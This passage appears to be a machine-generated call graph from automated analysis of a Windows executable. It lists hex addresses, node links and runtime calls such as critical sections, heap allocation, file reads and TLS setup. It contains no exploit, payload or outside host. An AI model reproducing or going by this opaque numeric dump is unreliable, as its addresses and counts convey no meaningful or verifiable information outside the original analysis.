13ee615 85 API calls 61210->61307 61211 13eefe1 61296 13dcd8e 8 API calls 61211->61296 61214 13ef1e1 61308 13dcd8e 8 API calls 61214->61308 61216 13eeff6 61297 13f2a3d 8 API calls 61216->61297 61217 13ef1f4 61219 13ef1fe 61217->61219 61220 13ef218 61217->61220 61309 13dcd8e 8 API calls 61219->61309 61310 13f2a3d 8 API calls 61220->61310 61221 13ef022 61298 13dcd8e 8 API calls 61221->61298 61225 13ef221 61311 13dd0e0 5 API calls ___scrt_fastfail 61225->61311 61226 13ef213 61312 13dcd8e 8 API calls 61226->61312 61230 13e8251 61229->61230 61234 13e8293 61229->61234 61231 13e829c 61230->61231 61232 13e8288 61230->61232 61230->61234 61231->61234 61335 13d2264 10 API calls 61231->61335 61334 13d2264 10 API calls 61232->61334 61234->61076 61237 13ee388 61236->61237 61250 13ee493 61236->61250 61237->61250 61336 13edcbf 61237->61336 61239 13ee39c ___scrt_fastfail 61239->61250 61352 13e5192 10 API calls 61239->61352 61241 13ee3c4 61241->61250 61353 13e5192 10 API calls 61241->61353 61243 13ee3d8 61245 13ee442 61243->61245 61243->61250 61354 13e5192 10 API calls 61243->61354 61246 13ee4cd 61245->61246 61355 13e5192 10 API calls 61245->61355 61357 13d2264 10 API calls 61246->61357 61249 13ee478 61249->61250 61356 13e5192 10 API calls 61249->61356 61250->61079 61250->61085 61250->61128 61252 13ee4b9 61252->61250 61254 13ee36e 80 API calls 61252->61254 61253 13ee488 61253->61246 61253->61250 61253->61252 61254->61250 61255->61074 61256->61084 61257->61099 61258->61088 61259->61093 61260->61090 61261->61094 61262->61098 61263->61102 61264->61105 61265->61110 61266->61103 61267->61114 61268->61113 61269->61117 61270->61120 61271->61118 61272->61125 61273->61132 61274->61137 61275->61142 61276->61147 61277->61150 61278->61155 61279->61159 61280->61164 61281->61168 61282->61170 61283->61172 61284->61174 61285->61175 61286->61178 61287->61180 61288->61182 61289->61184 61290->61186 61291->61188 61292->61194 61293->61206 61294->61206 61295->61211 61296->61216 61297->61221 61298->61189 61299->61189 61300->61189 61301->61204 61302->61204 61303->61197 61304->61200 61305->61205 61306->61210 61307->61214 61308->61217 61309->61226 61310->61225 61311->61226 61312->61120 61313->61129 61314->61134 61315->61138 61316->61128 61317->61146 61318->61148 61319->61152 61320->61158 61321->61160 61322->61165 61323->61120 61324->61122 61325->61128 61327 13d06e6 61326->61327 61333 13d0717 61326->61333 61760 13d08c1 EnterCriticalSection GetCurrentThreadId 61327->61760 61329 13d06f7 61761 1415640 61329->61761 61333->61082 61334->61234 61335->61234 61340 13edcdf 61336->61340 61343 13ede7e 61336->61343 61338 13ee154 61368 13e4789 9 API calls 61338->61368 61340->61343 61351 13eddce 61340->61351 61358 13e868b 61340->61358 61365 13e451b 9 API calls 61340->61365 61341 13ee15e 61341->61343 61369 13d2264 10 API calls 61341->61369 61343->61239 61344 13e45ec 9 API calls 61344->61351 61348 13d06db 5 API calls 61348->61351 61349 13ecc8a _strlen 61349->61351 61350 13ee07d _strlen 61350->61351 61351->61338 61351->61341 61351->61344 61351->61348 61351->61349 61351->61350 61366 13e8a99 6 API calls 61351->61366 61367 13d2264 10 API calls 61351->61367 61352->61241 61353->61243 61354->61243 61355->61249 61356->61253 61357->61250 61370 13ec5db 61358->61370 61364 13e869b 61364->61340 61365->61340 61366->61351 61367->61351 61368->61341 61369->61343 61371 13e8697 61370->61371 61372 13ec5e7 61370->61372 61371->61364 61374 13e8615 61371->61374 61379 13ec510 61372->61379 61375 13e862b 61374->61375 61376 13e8684 61374->61376 61375->61376 61377 13e8656 _strlen 61375->61377 61376->61364 61378 13d2264 10 API calls 61376->61378 61377->61375 61378->61364 61380 13ec536 61379->61380 61382 13ec52f 61379->61382 61381 13ec58e 61380->61381 61380->61382 61388 13ec1ef 61380->61388 61426 13e874c 61380->61426 61381->61382 61384 13ec1ef 78 API calls 61381->61384 61382->61371 61385 13ec5ad 61384->61385 61385->61382 61386 13e874c 5 API calls 61385->61386 61386->61382 61436 13ec0fa 61388->61436 61391 13e8615 _strlen 61392 13ec277 61391->61392 61393 13ec259 61392->61393 61449 13d6503 61392->61449 61393->61380 61398 13ec338 61401 13ec2e2 ___scrt_fastfail 61398->61401 61409 13ec36d 61398->61409 61501 13db697 12 API calls 61398->61501 61399 13ec2c6 61400 13ec2cb 61399->61400 61399->61401 61496 13d0a7c 10 API calls _LStrxfrm 61400->61496 61403 13ec32d 61401->61403 61497 13eb94a 61401->61497 61405 13ec397 61403->61405 61464 13d7838 61403->61464 61504 13d84f9 12 API calls 61405->61504 61407 13d6566 LeaveCriticalSection 61407->61393 61502 13d0a7c 10 API calls _LStrxfrm 61409->61502 61413 13ec37c 61503 13d84f9 12 API calls 61413->61503 61414 13ec39f 61505 13d6566 61414->61505 61417 13ec443 61419 13ec2da 61417->61419 61420 13e874c 5 API calls 61417->61420 61418 13ec429 61418->61417 61469 13ebe05 61418->61469 61419->61407 61420->61419 61423 13d06db 5 API calls 61424 13ec49c 61423->61424 61509 13d84f9 12 API calls 61424->61509 61427 13e875d 61426->61427 61430 13e8762 61426->61430 61428 13d6587 3 API calls 61427->61428 61428->61430 61431 13e8894 61430->61431 61759 13d6629 LeaveCriticalSection 61430->61759 61431->61380 61432 13e87a3 61433 13d06db 5 API calls 61432->61433 61434 13e8857 _LStrxfrm ___scrt_fastfail 61432->61434 61433->61432 61434->61431 61435 13d06db 5 API calls 61434->61435 61435->61431 61437 13ec12e 61436->61437 61438 13ec129 61436->61438 61437->61438 61439 13ec1af 61437->61439 61440 13ec15a 61437->61440 61438->61391 61438->61393 61439->61438 61513 13e86ca _strlen 61439->61513 61510 1416aab 61440->61510 61443 13ec1ce 61443->61438 61446 1416aab 38 API calls 61443->61446 61445 13ebe05 78 API calls 61447 13ec17a 61445->61447 61446->61438 61447->61438 61448 13d06db 5 API calls 61447->61448 61448->61438 61450 13d650c 61449->61450 61451 13d6564 61449->61451 61450->61451 61452 13d6538 61450->61452 61528 13d08e2 LeaveCriticalSection 61450->61528 61457 13d84b8 61451->61457 61529 13d08c1 EnterCriticalSection GetCurrentThreadId 61452->61529 61455 13d6543 61455->61451 61530 13d08c1 EnterCriticalSection GetCurrentThreadId 61455->61530 61458 13d6503 3 API calls 61457->61458 61459 13d84c8 61458->61459 61531 13d83b8 61459->61531 61462 13d6566 LeaveCriticalSection 61463 13d84f1 61462->61463 61463->61398 61463->61399 61465 13d6503 3 API calls 61464->61465 61466 13d7847 61465->61466 61467 13d6566 LeaveCriticalSection 61466->61467 61468 13d785b 61467->61468 61468->61405 61468->61418 61470 13ebe21 61469->61470 61480 13ec050 61469->61480 61564 13d08c1 EnterCriticalSection GetCurrentThreadId 61470->61564 61473 13ebfda 61475 13ebfe5 61473->61475 61476 13d06db 5 API calls 61473->61476 61474 13dea32 16 API calls 61474->61473 61618 13d0af7 11 API calls 61475->61618 61476->61475 61480->61423 61481 13ebfef 61489 13ec02f _LStrxfrm 61481->61489 61619 13f54b2 9 API calls 61481->61619 61484 13ec00f _strlen 61620 13d0614 61484->61620 61631 13d08e2 LeaveCriticalSection 61489->61631 61490 1413881 38 API calls 61495 13ebe2c 61490->61495 61491 13d06db 5 API calls 61491->61495 61494 13ebfc9 61494->61473 61494->61474 61495->61490 61495->61491 61495->61494 61565 13ec9fb 61495->61565 61577 13d094b 61495->61577 61580 13deedb 61495->61580 61602 13dea32 61495->61602 61610 13df3f8 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 61495->61610 61611 13df301 61495->61611 61496->61419 61498 13eb957 61497->61498 61500 13eb962 61497->61500 61757 13eb8b1 9 API calls _LStrxfrm 61498->61757 61500->61403 61501->61398 61502->61413 61503->61419 61504->61414 61506 13d656f 61505->61506 61508 13d6580 61505->61508 61506->61508 61758 13d08e2 LeaveCriticalSection 61506->61758 61508->61393 61509->61417 61514 1416204 61510->61514 61512 13ec165 61512->61445 61513->61443 61515 1415095 std::_Stofx_v2 18 API calls 61514->61515 61518 1416216 61515->61518 61516 141624f 61517 1412f3e __cftof 35 API calls 61516->61517 61522 141625b 61517->61522 61518->61516 61519 141622b 61518->61519 61527 141623b 61518->61527 61521 1413529 __cftof 18 API calls 61519->61521 61520 1413686 ctype 38 API calls 61520->61522 61521->61527 61522->61520 61523 141628a 61522->61523 61525 1416a31 std::_Stofx_v2 18 API calls 61523->61525 61526 14162f4 61523->61526 61524 1416a31 std::_Stofx_v2 18 API calls 61524->61527 61525->61526 61526->61524 61527->61512 61528->61450 61529->61455 61530->61455 61532 13d83e5 61531->61532 61533 13d83d6 61531->61533 61534 13d8402 61532->61534 61541 13d83ea 61532->61541 61547 13d79bc 61532->61547 61533->61541 61558 13dace3 12 API calls 61533->61558 61534->61541 61551 13d0929 61534->61551 61538 13d841f 61542 13d843d 61538->61542 61546 13d8425 61538->61546 61554 13d72f4 61538->61554 61541->61462 61542->61541 61559 13d7325 61542->61559 61545 13d06db 5 API calls 61545->61546 61563 13d79ed 12 API calls 61546->61563 61548 13d79d5 61547->61548 61549 13d79c8 61547->61549 61548->61534 61550 13d7ab9 12 API calls 61549->61550 61550->61548 61552 13d0614 6 API calls 61551->61552 61553 13d0933 ___scrt_fastfail 61552->61553 61553->61538 61555 13d7302 61554->61555 61557 13d72fd 61554->61557 61556 13d72a1 12 API calls 61555->61556 61556->61557 61557->61542 61558->61532 61560 13d732a 61559->61560 61561 13d7332 61559->61561 61562 13d588e 12 API calls 61560->61562 61561->61545 61562->61561 61563->61541 61564->61495 61566 13eca0c 61565->61566 61567 13eca10 61566->61567 61632 13d08c1 EnterCriticalSection GetCurrentThreadId 61566->61632 61567->61495 61569 13eca1d 61633 13d6587 61569->61633 61575 13eca43 61697 13d08e2 LeaveCriticalSection 61575->61697 61698 13d096b 61577->61698 61579 13d0954 ___scrt_fastfail 61579->61495 61581 13deef5 61580->61581 61582 13df001 61580->61582 61702 13d08c1 EnterCriticalSection GetCurrentThreadId 61581->61702 61582->61495 61584 13def04 61703 13ded15 61584->61703 61587 13deff7 61729 13d08e2 LeaveCriticalSection 61587->61729 61588 13ec9fb 78 API calls 61594 13def0c 61588->61594 61589 13def89 61599 13defd8 61589->61599 61716 13dca37 61589->61716 61593 13d06db 5 API calls 61595 13defc6 61593->61595 61594->61588 61594->61589 61594->61599 61601 13ded15 17 API calls 61594->61601 61713 13df849 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 61594->61713 61714 13de113 16 API calls 61594->61714 61715 13dea62 16 API calls 61594->61715 61595->61599 61727 13d0a3d 7 API calls 61595->61727 61728 13d0af7 11 API calls 61599->61728 61601->61594 61603 13dea3f 61602->61603 61604 13dea5a 61602->61604 61730 13d08c1 EnterCriticalSection GetCurrentThreadId 61603->61730 61604->61495 61606 13dea4a 61731 13de113 16 API calls 61606->61731 61608 13dea52 61732 13d08e2 LeaveCriticalSection 61608->61732 61610->61495 61733 13df198 61611->61733 61614 13dca37 9 API calls 61615 13df31a 61614->61615 61742 13df1f4 61615->61742 61618->61481 61619->61484 61621 13d062b 61620->61621 61622 13d06d1 61620->61622 61748 13d04e2 61621->61748 61622->61489 61630 13f54b2 9 API calls 61622->61630 61626 13d0660 _Yarn 61629 13d0677 _Yarn 61626->61629 61755 13d05aa EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 61626->61755 61756 13d08e2 LeaveCriticalSection 61629->61756 61630->61489 61631->61480 61632->61569 61634 13d6624 61633->61634 61635 13d659d 61633->61635 61638 13ec6cf 61634->61638 61635->61634 61636 13d08c1 EnterCriticalSection GetCurrentThreadId 61635->61636 61637 13d08e2 LeaveCriticalSection 61635->61637 61636->61635 61637->61635 61640 13ec736 ___scrt_fastfail 61638->61640 61642 13ec6f3 61638->61642 61639 13d6503 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 61639->61642 61641 13ec7b4 61640->61641 61644 13ec764 61640->61644 61643 13f4940 78 API calls 61641->61643 61642->61639 61642->61640 61648 13d6566 LeaveCriticalSection 61642->61648 61654 13ec793 61642->61654 61645 13ec78d 61643->61645 61646 13d0a59 6 API calls 61644->61646 61649 13ec7f6 61645->61649 61651 13ec5fb 12 API calls 61645->61651 61647 13ec76e 61646->61647 61647->61645 61650 13f4940 78 API calls 61647->61650 61648->61642 61653 13e874c EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 61649->61653 61659 13ec814 61649->61659 61652 13ec786 61650->61652 61651->61649 61655 13d06db EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 61652->61655 61653->61659 61657 13d21f9 11 API calls 61654->61657 61655->61645 61656 13ec977 61658 13ec99a 61656->61658 61661 13d0a59 6 API calls 61656->61661 61660 13ec7a9 61657->61660 61664 13ec9b1 61658->61664 61665 13dea32 16 API calls 61658->61665 61659->61656 61662 13ec85d 61659->61662 61663 13ec8a6 61659->61663 61696 13d6629 LeaveCriticalSection 61660->61696 61661->61658 61667 13dd8c0 8 API calls 61662->61667 61666 13dd8c0 8 API calls 61663->61666 61668 13ec9c5 61664->61668 61669 13ec9e1 61664->61669 61665->61664 61670 13ec8ae 61666->61670 61671 13ec865 61667->61671 61672 13d21f9 11 API calls 61668->61672 61674 13d21f9 11 API calls 61669->61674 61673 13dd917 9 API calls 61670->61673 61675 13dd917 9 API calls 61671->61675 61676 13ec9d4 61672->61676 61677 13ec8c6 61673->61677 61678 13ec9dc 61674->61678 61679 13ec87c 61675->61679 61681 13d06db EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 61676->61681 61682 13dd917 9 API calls 61677->61682 61685 13d0af7 11 API calls 61678->61685 61680 13dd917 9 API calls 61679->61680 61683 13ec894 61680->61683 61681->61678 61684 13ec8df 61682->61684 61687 13dd917 9 API calls 61683->61687 61686 13dd917 9 API calls 61684->61686 61685->61660 61688 13ec8f8 61686->61688 61687->61656 61689 13dd917 9 API calls 61688->61689 61690 13ec911 61689->61690 61691 13dd917 9 API calls 61690->61691 61692 13ec92a 61691->61692 61693 13dd917 9 API calls 61692->61693 61694 13ec943 61693->61694 61695 13dd917 9 API calls 61694->61695 61695->61683 61696->61575 61697->61567 61699 13d0974 61698->61699 61700 13d097f 61699->61700 61701 13d0614 6 API calls 61699->61701 61700->61579 61701->61700 61702->61584 61704 13ded29 61703->61704 61706 13ded31 61703->61706 61704->61594 61705 13ded50 61705->61704 61709 13d21f9 11 API calls 61705->61709 61706->61704 61706->61705 61707 13dd4af 14 API calls 61706->61707 61712 13dede8 61706->61712 61707->61712 61708 13d21f9 11 API calls 61710 13deea1 61708->61710 61709->61704 61711 13d0af7 11 API calls 61710->61711 61711->61705 61712->61708 61713->61594 61714->61594 61715->61594 61717 13dcaa4 61716->61717 61718 13dca42 61716->61718 61717->61593 61718->61717 61719 13dca6a 61718->61719 61721 13dc156 8 API calls 61718->61721 61720 13dcaa6 61719->61720 61724 13dca7d 61719->61724 61722 13dc2d6 _strlen 61720->61722 61721->61719 61722->61717 61723 13dca99 61723->61717 61725 13dc252 8 API calls 61723->61725 61724->61723 61726 13dc1d2 8 API calls 61724->61726 61725->61717 61726->61723 61727->61599 61728->61587 61729->61582 61730->61606 61731->61608 61732->61604 61734 13df1ce 61733->61734 61735 13df1a3 61733->61735 61736 13df1c2 61734->61736 61737 13d08c1 EnterCriticalSection GetCurrentThreadId 61734->61737 61735->61734 61738 13df1b8 61735->61738 61736->61614 61739 13df1dc 61737->61739 61740 13d08c1 EnterCriticalSection GetCurrentThreadId 61738->61740 61741 13d21f9 11 API calls 61739->61741 61740->61736 61741->61736 61743 13df1fb 61742->61743 61747 13df212 61742->61747 61744 13d0af7 11 API calls 61743->61744 61745 13df205 61744->61745 61746 13d08e2 LeaveCriticalSection 61745->61746 61746->61747 61747->61495 61749 13d04eb 61748->61749 61752 13d04f2 61748->61752 61750 13d082c 6 API calls 61749->61750 61750->61752 61751 13d08c1 EnterCriticalSection GetCurrentThreadId 61753 13d04fe 61751->61753 61752->61751 61753->61626 61754 13d05aa EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 61753->61754 61754->61626 61755->61629 61756->61622 61757->61500 61758->61508 61759->61432 61760->61329 61762 1420123 _free 2 API calls 61761->61762 61763 13d070c 61762->61763 61764 13d08e2 LeaveCriticalSection 61763->61764 61764->61333 61765 14248a6 61766 14248b3 61765->61766 61767 14248cb 61765->61767 61799 1413529 18 API calls _Deallocate 61766->61799 61769 142492a 61767->61769 61777 14248c3 61767->61777 61800 142ccb0 5 API calls 2 library calls 61767->61800 61783 142117f 61769->61783 61772 1424942 61788 14243e2 61772->61788 61774 1424949 61775 142117f __fread_nolock 18 API calls 61774->61775 61774->61777 61776 1424976 61775->61776 61776->61777 61778 142117f __fread_nolock 18 API calls 61776->61778 61779 1424984 61778->61779 61779->61777 61780 142117f __fread_nolock 18 API calls 61779->61780 61781 1424994 61780->61781 61782 142117f __fread_nolock 18 API calls 61781->61782 61782->61777 61784 14211a0 61783->61784 61785 142118b 61783->61785 61784->61772 61801 1413529 18 API calls _Deallocate 61785->61801 61787 142119b 61787->61772 61789 14243ee _unexpected 61788->61789 61790 14243f6 61789->61790 61791 1424462 61789->61791 61793 142444d 61789->61793 61790->61774 61802 1428f36 EnterCriticalSection 61791->61802 61843 1413529 18 API calls _Deallocate 61793->61843 61794 1424468 61795 1424484 61794->61795 61803 14244f6 61794->61803 61842 14244c3 LeaveCriticalSection 61795->61842 61799->61777 61800->61769 61801->61787 61802->61794 61804 1424508 61803->61804 61805 1424520 61803->61805 61804->61795 61805->61804 61806 142456b 61805->61806 61808 142459a 61805->61808 61858 1413529 18 API calls _Deallocate 61806->61858 61809 14245b3 61808->61809 61810 142460a 61808->61810 61813 14245ce 61808->61813 61809->61813 61815 14245b8 61809->61815 61850 142255c 61810->61850 61812 1424621 61816 1420123 _free 2 API calls 61812->61816 61849 1413529 18 API calls _Deallocate 61813->61849 61844 142c903 61815->61844 61818 142462a 61816->61818 61817 1424761 61820 14247d7 61817->61820 61823 142477a GetConsoleMode 61817->61823 61821 1420123 _free 2 API calls 61818->61821 61822 14247db ReadFile 61820->61822 61824 1424631 61821->61824 61825 14247f5 61822->61825 61826 142484f GetLastError 61822->61826 61823->61820 61827 142478b 61823->61827 61840 14245e5 __fread_nolock 61824->61840 61855 142cafc 21 API calls __fread_nolock 61824->61855 61825->61826 61829 14247cc 61825->61829 61828 1424873 61826->61828 61826->61840 61827->61822 61830 1424791 ReadConsoleW 61827->61830 61833 14247b3 __dosmaperr 61828->61833 61828->61840 61835 1424831 61829->61835 61836 142481a 61829->61836 61829->61840 61830->61829 61834 14247ad GetLastError 61830->61834 61831 1420123 _free 2 API calls 61831->61804 61833->61840 61834->61833 61837 1424848 61835->61837 61835->61840 61856 1424210 24 API calls 2 library calls 61836->61856 61857 142403f 22 API calls __fread_nolock 61837->61857 61840->61831 61841 142484d 61841->61840 61842->61790 61843->61790 61846 142c91d 61844->61846 61847 142c910 61844->61847 61845 142c929 61845->61817 61846->61845 61859 1413529 18 API calls _Deallocate 61846->61859 61847->61817 61849->61840 61852 1422598 61850->61852 61853 142256a std::_Locinfo::_W_Getdays 61850->61853 61851 1422585 RtlAllocateHeap 61851->61852 61851->61853 61852->61812 61853->61851 61853->61852 61860 141d068 EnterCriticalSection LeaveCriticalSection numpunct 61853->61860 61855->61815 61856->61840 61857->61841 61858->61804 61859->61847 61860->61853 61861 141f984 61862 141fa7f __strnicoll 5 API calls 61861->61862 61863 141f99a 61862->61863 61864 14206a7 61869 141fc12 61864->61869 61868 14206bb 61870 141fa7f __strnicoll 5 API calls 61869->61870 61871 141fc2e 61870->61871 61872 141fc46 TlsAlloc 61871->61872 61873 141fc37 61871->61873 61872->61873 61873->61868 61874 14205f2 GetLastError 61873->61874 61875 1420609 61874->61875 61876 14200c6 _unexpected 3 API calls 61875->61876 61885 1420615 SetLastError 61875->61885 61878 142063d 61876->61878 61879 1420645 61878->61879 61880 142067d 61878->61880 61882 1420123 _free 2 API calls 61879->61882 61886 14202c9 EnterCriticalSection LeaveCriticalSection _unexpected 61880->61886 61882->61885 61883 1420688 61884 1420123 _free 2 API calls 61883->61884 61884->61885 61885->61868 61886->61883 61887 141dc58 61890 1428c04 61887->61890 61891 1428c14 61890->61891 61892 141dc67 61890->61892 61891->61892 61894 14233ad 61891->61894 61895 14233b9 _unexpected 61894->61895 61906 141703f EnterCriticalSection 61895->61906 61897 14233c0 61907 1428e98 61897->61907 61902 14233ef 61902->61891 61903 14233d9 61919 14232f9 GetStdHandle GetFileType 61903->61919 61905 14233de 61920 1423404 LeaveCriticalSection std::_Lockit::~_Lockit 61905->61920 61906->61897 61908 1428ea4 _unexpected 61907->61908 61909 1428ece 61908->61909 61910 1428ead 61908->61910 61921 141703f EnterCriticalSection 61909->61921 61922 1413529 18 API calls _Deallocate 61910->61922 61913 14233cf 61913->61905 61918 1423243 26 API calls 61913->61918 61914 1428f06 61923 1428f2d LeaveCriticalSection std::_Lockit::~_Lockit 61914->61923 61915 1428eda 61915->61914 61917 1428de8 __wsopen_s 11 API calls 61915->61917 61917->61915 61918->61903 61919->61905 61920->61902 61921->61915 61922->61913 61923->61913 61924 140e0ea 61929 140e5ae SetUnhandledExceptionFilter 61924->61929 61926 140e0ef 61930 141f63f 18 API calls __cftof 61926->61930 61928 140e0fa 61929->61926 61930->61928 61931 141101d 61939 14120f3 61931->61939 61934 1411026 61936 141102e 61937 1411039 61936->61937 61953 141212f DeleteCriticalSection 61936->61953 61940 14120fc 61939->61940 61942 1412125 61940->61942 61944 1411022 61940->61944 61954 1412330 61940->61954 61959 141212f DeleteCriticalSection 61942->61959 61944->61934 61945 141114b 61944->61945 61975 1412241 61945->61975 61948 1411160 61948->61936 61950 141116e 61951 141117b 61950->61951 61981 141117e 6 API calls ___vcrt_FlsFree 61950->61981 61951->61936 61953->61934 61960 14121f8 61954->61960 61957 1412353 61957->61940 61958 1412368 InitializeCriticalSectionAndSpinCount 61958->61957 61959->61944 61961 1412210 61960->61961 61962 1412239 61960->61962 61961->61962 61967 141215e 61961->61967 61962->61957 61962->61958 61965 1412225 GetProcAddress 61965->61962 61966 1412233 61965->61966 61966->61962 61973 141216a ___vcrt_FlsSetValue 61967->61973 61968 14121de 61968->61962 61968->61965 61969 1412180 LoadLibraryExW 61970 14121e5 61969->61970 61971 141219e GetLastError 61969->61971 61970->61968 61972 14121ed FreeLibrary 61970->61972 61971->61973 61972->61968 61973->61968 61973->61969 61974 14121c0 LoadLibraryExW 61973->61974 61974->61970 61974->61973 61976 14121f8 ___vcrt_FlsSetValue 5 API calls 61975->61976 61977 141225b 61976->61977 61978 1412274 TlsAlloc 61977->61978 61979 1411155 61977->61979 61979->61948 61980 14122f2 6 API calls ___vcrt_FlsSetValue 61979->61980 61980->61950 61981->61948 61982 140e0fc 61984 140e108 _unexpected 61982->61984 61983 140e268 62064 140e44c IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 61983->62064 61984->61983 61996 140e139 61984->61996 61986 140e26f 62065 141287e 61986->62065 61990 140e18b ___scrt_release_startup_lock 61991 140e199 61990->61991 61994 140e1a1 ___scrt_is_nonwritable_in_current_image 61991->61994 61995 140e1ac 61991->61995 61992 140e27d 61993 140e158 61994->61995 61997 140e1c7 ___scrt_is_nonwritable_in_current_image 61995->61997 61998 140e1d9 61995->61998 61996->61990 61996->61993 61997->61998 61999 140e1d2 61997->61999 62010 141d7ec 61998->62010 62061 1412858 35 API calls 2 library calls 61999->62061 62002 140e1df 62014 13cc93c 62002->62014 62011 141d7f5 62010->62011 62012 141d7fa 62010->62012 62069 141d550 62011->62069 62012->62002 62015 13cc946 numpunct 62014->62015 62257 1412c70 62015->62257 62017 13cc957 62260 13b8f5d 62017->62260 62021 13cc976 62269 13ce917 62021->62269 62023 13cc9a3 62272 13b3406 62023->62272 62025 13cc9fe 62281 13b3292 62025->62281 62027 13cca20 62288 13ccd07 62027->62288 62029 13cca3e 62030 13ce917 19 API calls 62029->62030 62031 13cca6b 62030->62031 62292 13b83d5 62031->62292 62037 13ccaa4 62038 13ccc42 62037->62038 62052 13cbe05 175 API calls 62037->62052 62055 13ce917 19 API calls 62037->62055 62059 13ce8c7 19 API calls 62037->62059 62060 13ce981 19 API calls 62037->62060 63004 13ccddf EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62037->63004 63005 13ccd76 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62037->63005 63006 13ccec4 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62037->63006 63007 13cce5b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 62037->63007 62396 13cbcd1 62038->62396 62040 13ccc47 62417 13c3e7b 62040->62417 62052->62037 62055->62037 62059->62037 62060->62037 62061->61998 62064->61986 64869 141271c 62065->64869 62068 1412842 16 API calls std::locale::_Setgloballocale 62068->61992 62070 141d559 62069->62070 62071 141d56f 62069->62071 62070->62071 62075 141d57c 62070->62075 62071->62012 62073 141d566 62073->62071 62088 141d6ce 6 API calls 3 library calls 62073->62088 62076 141d585 62075->62076 62077 141d588 62075->62077 62076->62073 62089 1428509 62077->62089 62083 141d5a5 62086 1420123 _free 2 API calls 62083->62086 62084 1420123 _free 2 API calls 62085 141d5c9 62084->62085 62085->62073 62087 141d59a 62086->62087 62087->62084 62088->62071 62090 1428512 62089->62090 62091 141d58f 62089->62091 62108 1420558 62090->62108 62095 14287fd GetEnvironmentStringsW 62091->62095 62096 1428814 62095->62096 62106 142886a 62095->62106 62099 142749b __cftof WideCharToMultiByte 62096->62099 62097 1428873 FreeEnvironmentStringsW 62098 141d594 62097->62098 62098->62087 62107 141d5cf 18 API calls 4 library calls 62098->62107 62100 142882d 62099->62100 62101 142255c std::_Locinfo::_W_Getdays 3 API calls 62100->62101 62100->62106 62102 142883d 62101->62102 62103 142749b __cftof WideCharToMultiByte 62102->62103 62104 1428855 62102->62104 62103->62104 62105 1420123 _free 2 API calls 62104->62105 62105->62106 62106->62097 62106->62098 62107->62083 62109 1420563 62108->62109 62111 14200c6 _unexpected 3 API calls 62109->62111 62121 142056f 62109->62121 62114 1420593 62111->62114 62113 14205e8 62122 1428350 62113->62122 62115 142059b 62114->62115 62116 14205cf 62114->62116 62117 1420123 _free 2 API calls 62115->62117 62136 14202c9 EnterCriticalSection LeaveCriticalSection _unexpected 62116->62136 62117->62121 62119 14205da 62120 1420123 _free 2 API calls 62119->62120 62120->62121 62121->62113 62137 141cf95 35 API calls std::locale::_Setgloballocale 62121->62137 62138 1428469 62122->62138 62127 142837c 62127->62091 62128 142255c std::_Locinfo::_W_Getdays 3 API calls 62129 142838d 62128->62129 62134 14283ba 62129->62134 62156 1428564 62129->62156 62131 1420123 _free 2 API calls 62133 14283cd 62131->62133 62132 14283b2 62132->62134 62135 1420123 _free 2 API calls 62132->62135 62133->62091 62134->62131 62135->62134 62136->62119 62139 1428475 _unexpected 62138->62139 62140 142848f 62139->62140 62167 141703f EnterCriticalSection 62139->62167 62142 1428363 62140->62142 62169 141cf95 35 API calls std::locale::_Setgloballocale 62140->62169 62149 14280f9 62142->62149 62143 14284cb 62168 14284e8 LeaveCriticalSection std::_Lockit::~_Lockit 62143->62168 62147 142849f 62147->62143 62148 1420123 _free 2 API calls 62147->62148 62148->62143 62170 1412f3e 62149->62170 62152 142811a GetOEMCP 62154 1428143 62152->62154 62153 142812c 62153->62154 62155 1428131 GetACP 62153->62155 62154->62127 62154->62128 62155->62154 62157 14280f9 37 API calls 62156->62157 62158 1428584 62157->62158 62159 14285be IsValidCodePage 62158->62159 62164 14285fa ___scrt_fastfail 62158->62164 62162 14285d0 62159->62162 62159->62164 62160 140e288 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 62161 1428755 62160->62161 62161->62132 62163 14285ff GetCPInfo 62162->62163 62166 14285d9 ___scrt_fastfail 62162->62166 62163->62164 62163->62166 62164->62160 62198 14281cf 62166->62198 62167->62147 62168->62140 62171 1412f5e 62170->62171 62172 1412f55 62170->62172 62171->62172 62178 142049b GetLastError 62171->62178 62172->62152 62172->62153 62176 1412f94 62195 1420f9d 35 API calls __cftof 62176->62195 62179 14204b2 62178->62179 62180 14200c6 _unexpected 3 API calls 62179->62180 62192 14204be SetLastError 62179->62192 62187 14204e6 62180->62187 62182 14204ee 62190 1420123 _free 2 API calls 62182->62190 62183 1420552 62197 141cf95 35 API calls std::locale::_Setgloballocale 62183->62197 62184 1412f7e 62194 1420f70 35 API calls __Getctype 62184->62194 62187->62182 62188 1420526 62187->62188 62196 14202c9 EnterCriticalSection LeaveCriticalSection _unexpected 62188->62196 62190->62192 62191 1420531 62193 1420123 _free 2 API calls 62191->62193 62192->62183 62192->62184 62193->62192 62194->62176 62195->62172 62196->62191 62199 14281f7 GetCPInfo 62198->62199 62208 14282c0 62198->62208 62204 142820f 62199->62204 62199->62208 62200 140e288 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 62202 142834e 62200->62202 62202->62164 62209 1424eb2 62204->62209 62207 142169d 38 API calls 62207->62208 62208->62200 62210 1412f3e __cftof 35 API calls 62209->62210 62211 1424ed2 62210->62211 62212 142741f __fassign MultiByteToWideChar 62211->62212 62215 1424eff 62212->62215 62213 1424f90 62214 140e288 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 62213->62214 62217 1424fb3 62214->62217 62215->62213 62216 142255c std::_Locinfo::_W_Getdays 3 API calls 